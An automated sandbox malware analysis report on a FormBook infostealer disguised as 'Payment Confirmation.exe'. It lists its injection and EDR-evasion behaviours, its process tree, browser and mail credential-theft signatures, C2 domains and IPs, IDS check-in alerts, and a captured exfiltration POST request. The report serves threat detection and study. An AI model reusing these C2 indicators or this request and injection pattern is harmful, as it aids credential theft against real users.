Windows Analysis Report
Payment Confirmation.exe

Overview

General Information

Sample name: Payment Confirmation.exe
Analysis ID: 1665536
MD5: 259c57c7a4c9d2920821233d0f42b01a
SHA1: a91511c9bd6c4b826be1a3cf8cecf43649189a3f
SHA256: f190d00b8327b3dbd653ad7aaacc15df1ccfdf4a4c780fe55249f3068df51fae
Tags: exe, user-threatcat_ch

Detection

FormBook
Score: 100
Range: 0 - 100
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected FormBook
Found direct / indirect Syscall (likely to bypass EDR)
Initial sample is a PE file and has a suspicious name
Injects a PE file into a foreign process
Joe Sandbox ML detected suspicious sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • Payment Confirmation.exe (PID: 7724 cmdline: "C:\Users\user\Desktop\Payment Confirmation.exe" MD5: 259C57C7A4C9D2920821233D0F42B01A)
    • Payment Confirmation.exe (PID: 4780 cmdline: "C:\Users\user\Desktop\Payment Confirmation.exe" MD5: 259C57C7A4C9D2920821233D0F42B01A)
      • yT3kwEipvxIo4KXERrb.exe (PID: 6712 cmdline: "C:\Program Files (x86)\mfyQbcPhqmWFzTNgTDoFAaLrLewzuEgxpaKKAwiZKgOitBelbveNWwNc\hmLbCV9dNfE.exe" MD5: 9C98D1A23EFAF1B156A130CEA7D2EE3A)
        • auditpol.exe (PID: 2576 cmdline: "C:\Windows\SysWOW64\auditpol.exe" MD5: 70DF7973F8D4AAA2EE3B28391239397B)
          • yT3kwEipvxIo4KXERrb.exe (PID: 6644 cmdline: "C:\Program Files (x86)\mfyQbcPhqmWFzTNgTDoFAaLrLewzuEgxpaKKAwiZKgOitBelbveNWwNc\62xrulxZe8.exe" MD5: 9C98D1A23EFAF1B156A130CEA7D2EE3A)
          • firefox.exe (PID: 5156 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup
No configs have been found
Source | Rule | Description | Author
0000000A.00000002.3731694034.0000000003A60000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
0000000A.00000002.3731637092.0000000003A10000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
0000000B.00000002.3733429458.0000000004A70000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
00000007.00000002.1549027122.0000000000400000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
0000000A.00000002.3729621746.0000000003300000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security

Source | Rule | Description | Author
7.2.Payment Confirmation.exe.400000.0.raw.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
7.2.Payment Confirmation.exe.400000.0.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security

No Sigma rule has matched

AV Detection

Source: http://www.venturegioballng.fun/gg0c/; Avira URL Cloud: Label: malware
Source: http://www.venturegioballng.fun/gg0c/?slIx=g0AT78l8mTqVe7boqMXjGRmSE0wqnDlb+F/r8sxxoF+RqpA299JGbXJ4ZA0tjoRIog9mEGsNT+rHGNL9Q1Iz2hHxFvFKDuT+iosMrtGmmoWKojnO/1i3c7q3qwHF8zvfwA==&Fd=GFVtMVdh-dnDd; Avira URL Cloud: Label: malware
Source: http://www.full4movies.christmas/0by2/?Fd=GFVtMVdh-dnDd&slIx=Xkvyqp+XZLKZU589TKRz7G6wpBuaXd0vN6gjsxC0kkeXdHL11jMVdUY60z58AKK0JzCQFYYyiKoBtZI4Oma89bfmIAUiHCvCZ4a4/Cs8RjaSheXxzQX3fo1AsGwPUZxaxw==; Avira URL Cloud: Label: malware
Source: http://www.full4movies.christmas/0by2/; Avira URL Cloud: Label: malware
Source: Payment Confirmation.exe; Virustotal: Detection: 30%
Source: Payment Confirmation.exe; ReversingLabs: Detection: 36%
Source: Yara match; File source: 7.2.Payment Confirmation.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 7.2.Payment Confirmation.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match; File source: 0000000A.00000002.3731694034.0000000003A60000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 0000000A.00000002.3731637092.0000000003A10000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 0000000B.00000002.3733429458.0000000004A70000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000007.00000002.1549027122.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 0000000A.00000002.3729621746.0000000003300000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000007.00000002.1551387798.0000000001D40000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000007.00000002.1551550451.0000000003B90000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000009.00000002.3731554872.0000000004B00000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Submitted Sample; Neural Call Log Analysis: 91.6%
Source: Payment Confirmation.exe; Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: Payment Confirmation.exe; Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: trbp.pdb source: Payment Confirmation.exe
Source: Binary string: auditpol.pdbGCTL source: Payment Confirmation.exe, 00000007.00000002.1550004144.0000000001477000.00000004.00000020.00020000.00000000.sdmp, yT3kwEipvxIo4KXERrb.exe, 00000009.00000002.3730747872.00000000010AE000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: wntdll.pdbUGP source: Payment Confirmation.exe, 00000007.00000002.1550286836.00000000019A0000.00000040.00001000.00020000.00000000.sdmp, auditpol.exe, 0000000A.00000003.1552521292.0000000003ADD000.00000004.00000020.00020000.00000000.sdmp, auditpol.exe, 0000000A.00000002.3731867390.0000000003C90000.00000040.00001000.00020000.00000000.sdmp, auditpol.exe, 0000000A.00000003.1549442641.0000000003926000.00000004.00000020.00020000.00000000.sdmp, auditpol.exe, 0000000A.00000002.3731867390.0000000003E2E000.00000040.00001000.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb source: Payment Confirmation.exe, Payment Confirmation.exe, 00000007.00000002.1550286836.00000000019A0000.00000040.00001000.00020000.00000000.sdmp, auditpol.exe, auditpol.exe, 0000000A.00000003.1552521292.0000000003ADD000.00000004.00000020.00020000.00000000.sdmp, auditpol.exe, 0000000A.00000002.3731867390.0000000003C90000.00000040.00001000.00020000.00000000.sdmp, auditpol.exe, 0000000A.00000003.1549442641.0000000003926000.00000004.00000020.00020000.00000000.sdmp, auditpol.exe, 0000000A.00000002.3731867390.0000000003E2E000.00000040.00001000.00020000.00000000.sdmp
Source: Binary string: auditpol.pdb source: Payment Confirmation.exe, 00000007.00000002.1550004144.0000000001477000.00000004.00000020.00020000.00000000.sdmp, yT3kwEipvxIo4KXERrb.exe, 00000009.00000002.3730747872.00000000010AE000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: trbp.pdbSHA256@} source: Payment Confirmation.exe
Source: Binary string: C:\Work\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: yT3kwEipvxIo4KXERrb.exe, 00000009.00000002.3729563719.000000000049F000.00000002.00000001.01000000.0000000A.sdmp, yT3kwEipvxIo4KXERrb.exe, 0000000B.00000000.1619731121.000000000049F000.00000002.00000001.01000000.0000000A.sdmp
Source: C:\Windows\SysWOW64\auditpol.exe; Code function: 10_2_0331C9F0 FindFirstFileW,FindNextFileW,FindClose; 10_2_0331C9F0
Source: C:\Windows\SysWOW64\auditpol.exe; Code function: 4x nop then xor eax, eax; 10_2_03309F90
Source: C:\Windows\SysWOW64\auditpol.exe; Code function: 4x nop then mov ebx, 00000004h; 10_2_03B604F8

Networking

Source: Network traffic; Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:49703 -> 104.21.16.1:80
Source: Network traffic; Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:49707 -> 217.70.184.50:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49736 -> 13.248.169.48:80
Source: Network traffic; Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:49694 -> 200.147.100.53:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49712 -> 172.67.144.160:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49696 -> 3.33.130.190:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49713 -> 172.67.144.160:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49728 -> 13.248.169.48:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49716 -> 209.74.80.150:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49697 -> 3.33.130.190:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49714 -> 172.67.144.160:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49730 -> 13.248.169.48:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49702 -> 104.21.16.1:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49729 -> 13.248.169.48:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49709 -> 13.248.169.48:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49720 -> 13.248.169.48:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49705 -> 217.70.184.50:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49704 -> 217.70.184.50:80
Source: Network traffic; Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:49723 -> 13.248.169.48:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49725 -> 13.248.169.48:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49710 -> 13.248.169.48:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49726 -> 13.248.169.48:80
Source: Network traffic; Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:49699 -> 3.33.130.190:80
Source: Network traffic; Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:49711 -> 13.248.169.48:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49722 -> 13.248.169.48:80
Source: Network traffic; Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:49719 -> 209.74.80.150:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49706 -> 217.70.184.50:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49698 -> 3.33.130.190:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49701 -> 104.21.16.1:80
Source: Network traffic; Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:49731 -> 13.248.169.48:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49708 -> 13.248.169.48:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49737 -> 13.248.169.48:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49718 -> 209.74.80.150:80
Source: Network traffic; Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:49735 -> 104.21.27.203:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49717 -> 209.74.80.150:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49740 -> 81.169.145.84:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49734 -> 104.21.27.203:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49724 -> 13.248.169.48:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49741 -> 81.169.145.84:80
Source: Network traffic; Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:49715 -> 172.67.144.160:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49700 -> 104.21.16.1:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49738 -> 13.248.169.48:80
Source: Network traffic; Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:49739 -> 13.248.169.48:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49721 -> 13.248.169.48:80
Source: Network traffic; Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:49743 -> 81.169.145.84:80
Source: Network traffic; Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:49727 -> 13.248.169.48:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49742 -> 81.169.145.84:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49732 -> 104.21.27.203:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49733 -> 104.21.27.203:80
Source: DNS query: www.globedesign.xyz
Source: DNS query: www.tieniu09.xyz
Source: DNS query: www.cryptoannounce.xyz
Source: DNS query: www.auradesigns.xyz
Source: DNS query: www.banayad.xyz
Source: DNS query: www.ekstrak.xyz
Source: Joe Sandbox View; IP Address: 104.21.16.1
Source: Joe Sandbox View; IP Address: 13.248.169.48
Source: unknown; UDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknown | HTTP traffic detected:
                    POST /gg0c/ HTTP/1.1
                    Host: www.venturegioballng.fun
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                    Accept-Encoding: gzip, deflate, br
                    Accept-Language: en-US,en;q=0.5
                    Origin: http://www.venturegioballng.fun
                    Referer: http://www.venturegioballng.fun/gg0c/
                    Connection: close
                    Cache-Control: no-cache
                    Content-Length: 205
                    Content-Type: application/x-www-form-urlencoded
                    User-Agent: Mozilla/5.0 (Unknown; Linux armv7l) AppleWebKit/537.1+ PBRM/1.0 ( ;LGE ;40LX761H-ZA ;03.10.00 ;0x00000001)
                    Data Ascii: slIx=t2oz4MAshCLeXaLCkcbzLCXDVkYygSRUzwHsqsNSnS/nguNenOxXaC8raU4fpYUJthZGXGcDVrPXMpH0bCdOqVv1PI9JO+7krYkQzuyql5rc+HWB5weff7edihP79BaDq9Wkup6HjXuZPKVWikksIswb47S9Bp9qu2NIRdxkg2TiTeyMHe2s+PufTet8ZQfIwqfQzHU=
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 15 Apr 2025 14:33:11 GMTServer: Apache/2.4.63 (Unix)Content-Length: 196Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
                Source: auditpol.exe, 0000000A.00000002.3732286198.000000000597C000.00000004.10000000.00040000.00000000.sdmp, yT3kwEipvxIo4KXERrb.exe, 0000000B.00000002.3731738371.0000000003CFC000.00000004.00000001.00040000.00000000.sdmp; String found in binary or memory: http://cpanel.com/?utm_source=cpanelwhm&utm_medium=cplogo&utm_content=logolink&utm_campaign=404refer
                Source: firefox.exe, 0000000C.00000002.1841738172.000000001C344000.00000004.80000000.00040000.00000000.sdmp; String found in binary or memory: http://economia.uol.com.br/0492/?slIx=
                Source: yT3kwEipvxIo4KXERrb.exe, 0000000B.00000002.3733429458.0000000004AD5000.00000040.80000000.00040000.00000000.sdmp; String found in binary or memory: http://www.stuhlmann.cloud
                Source: yT3kwEipvxIo4KXERrb.exe, 0000000B.00000002.3733429458.0000000004AD5000.00000040.80000000.00040000.00000000.sdmp; String found in binary or memory: http://www.stuhlmann.cloud/c8yp/
                Source: auditpol.exe, 0000000A.00000003.1733478145.00000000086A8000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: https://ac.ecosia.org?q=
                Source: auditpol.exe, 0000000A.00000003.1733478145.00000000086A8000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                Source: auditpol.exe, 0000000A.00000003.1733478145.00000000086A8000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                Source: auditpol.exe, 0000000A.00000003.1733478145.00000000086A8000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                Source: auditpol.exe, 0000000A.00000003.1733478145.00000000086A8000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: https://duckduckgo.com/ac/?q=
                Source: auditpol.exe, 0000000A.00000003.1733478145.00000000086A8000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: https://duckduckgo.com/chrome_newtabv209h
                Source: auditpol.exe, 0000000A.00000003.1733478145.00000000086A8000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                Source: auditpol.exe, 0000000A.00000003.1733478145.00000000086A8000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: https://gemini.google.com/app?q=
                Source: auditpol.exe, 0000000A.00000002.3729900422.00000000034E2000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
                Source: auditpol.exe, 0000000A.00000002.3729900422.000000000350C000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
                Source: auditpol.exe, 0000000A.00000002.3729900422.00000000034E2000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
                Source: auditpol.exe, 0000000A.00000002.3729900422.00000000034E2000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
                Source: auditpol.exe, 0000000A.00000002.3729900422.00000000034E2000.00000004.00000020.00020000.00000000.sdmp, auditpol.exe, 0000000A.00000002.3729900422.000000000350C000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
                Source: auditpol.exe, 0000000A.00000002.3729900422.00000000034E2000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
                Source: auditpol.exe, 0000000A.00000003.1729521923.0000000008681000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
                Source: auditpol.exe, 0000000A.00000002.3732286198.0000000004B5A000.00000004.10000000.00040000.00000000.sdmp, auditpol.exe, 0000000A.00000002.3734265785.0000000006B30000.00000004.00000800.00020000.00000000.sdmp, yT3kwEipvxIo4KXERrb.exe, 0000000B.00000002.3731738371.0000000002EDA000.00000004.00000001.00040000.00000000.sdmp; String found in binary or memory: https://whois.gandi.net/en/results?search=curiosa.news
                Source: auditpol.exe, 0000000A.00000003.1733478145.00000000086A8000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: https://www.ecosia.org/newtab/v20
                Source: auditpol.exe, 0000000A.00000002.3732286198.0000000004B5A000.00000004.10000000.00040000.00000000.sdmp, auditpol.exe, 0000000A.00000002.3734265785.0000000006B30000.00000004.00000800.00020000.00000000.sdmp, yT3kwEipvxIo4KXERrb.exe, 0000000B.00000002.3731738371.0000000002EDA000.00000004.00000001.00040000.00000000.sdmp; String found in binary or memory: https://www.gandi.net/en/domain
                Source: auditpol.exe, 0000000A.00000003.1733478145.00000000086A8000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_alldp.ico
                Source: auditpol.exe, 0000000A.00000002.3732286198.0000000004E7E000.00000004.10000000.00040000.00000000.sdmp, yT3kwEipvxIo4KXERrb.exe, 0000000B.00000002.3731738371.00000000031FE000.00000004.00000001.00040000.00000000.sdmp; String found in binary or memory: https://www.tieniu09.xyz

                E-Banking Fraud

                Source: Yara match; File source: 7.2.Payment Confirmation.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara match; File source: 7.2.Payment Confirmation.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara match; File source: 0000000A.00000002.3731694034.0000000003A60000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match; File source: 0000000A.00000002.3731637092.0000000003A10000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match; File source: 0000000B.00000002.3733429458.0000000004A70000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match; File source: 00000007.00000002.1549027122.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match; File source: 0000000A.00000002.3729621746.0000000003300000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match; File source: 00000007.00000002.1551387798.0000000001D40000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match; File source: 00000007.00000002.1551550451.0000000003B90000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match; File source: 00000009.00000002.3731554872.0000000004B00000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

                System Summary

                Source: initial sample; Static PE information: Filename: Payment Confirmation.exe
                Source: C:\Users\user\Desktop\Payment Confirmation.exe; Code function: 7_2_0042CCC3 NtClose
                Source: C:\Users\user\Desktop\Payment Confirmation.exe; Code function: 7_2_01A12B60 NtClose,LdrInitializeThunk
                Source: C:\Users\user\Desktop\Payment Confirmation.exe; Code function: 7_2_01A12DF0 NtQuerySystemInformation,LdrInitializeThunk
                Source: C:\Users\user\Desktop\Payment Confirmation.exe; Code function: 7_2_01A12C70 NtFreeVirtualMemory,LdrInitializeThunk
                Source: C:\Users\user\Desktop\Payment Confirmation.exe; Code function: 7_2_01A135C0 NtCreateMutant,LdrInitializeThunk
                Source: C:\Users\user\Desktop\Payment Confirmation.exe; Code function: 7_2_01A14340 NtSetContextThread
                Source: C:\Users\user\Desktop\Payment Confirmation.exe; Code function: 7_2_01A14650 NtSuspendThread
                Source: C:\Users\user\Desktop\Payment Confirmation.exe; Code function: 7_2_01A12BA0 NtEnumerateValueKey
                Source: C:\Users\user\Desktop\Payment Confirmation.exe; Code function: 7_2_01A12B80 NtQueryInformationFile
                Source: C:\Users\user\Desktop\Payment Confirmation.exe; Code function: 7_2_01A12BE0 NtQueryValueKey
                Source: C:\Users\user\Desktop\Payment Confirmation.exe; Code function: 7_2_01A12BF0 NtAllocateVirtualMemory
                Source: C:\Users\user\Desktop\Payment Confirmation.exe; Code function: 7_2_01A12AB0 NtWaitForSingleObject
                Source: C:\Users\user\Desktop\Payment Confirmation.exe; Code function: 7_2_01A12AF0 NtWriteFile
                Source: C:\Users\user\Desktop\Payment Confirmation.exe; Code function: 7_2_01A12AD0 NtReadFile
                Source: C:\Users\user\Desktop\Payment Confirmation.exe; Code function: 7_2_01A12DB0 NtEnumerateKey
                Source: C:\Users\user\Desktop\Payment Confirmation.exe; Code function: 7_2_01A12DD0 NtDelayExecution
                Source: C:\Users\user\Desktop\Payment Confirmation.exe; Code function: 7_2_01A12D30 NtUnmapViewOfSection
                Source: C:\Users\user\Desktop\Payment Confirmation.exe; Code function: 7_2_01A12D00 NtSetInformationFile
                Source: C:\Users\user\Desktop\Payment Confirmation.exe; Code function: 7_2_01A12D10 NtMapViewOfSection
                Source: C:\Users\user\Desktop\Payment Confirmation.exe; Code function: 7_2_01A12CA0 NtQueryInformationToken
                Source: C:\Users\user\Desktop\Payment Confirmation.exe; Code function: 7_2_01A12CF0 NtOpenProcess
                Source: C:\Users\user\Desktop\Payment Confirmation.exe; Code function: 7_2_01A12CC0 NtQueryVirtualMemory
                Source: C:\Users\user\Desktop\Payment Confirmation.exe; Code function: 7_2_01A12C00 NtQueryInformationProcess
                Source: C:\Users\user\Desktop\Payment Confirmation.exe; Code function: 7_2_01A12C60 NtCreateKey
                Source: C:\Users\user\Desktop\Payment Confirmation.exe; Code function: 7_2_01A12FA0 NtQuerySection
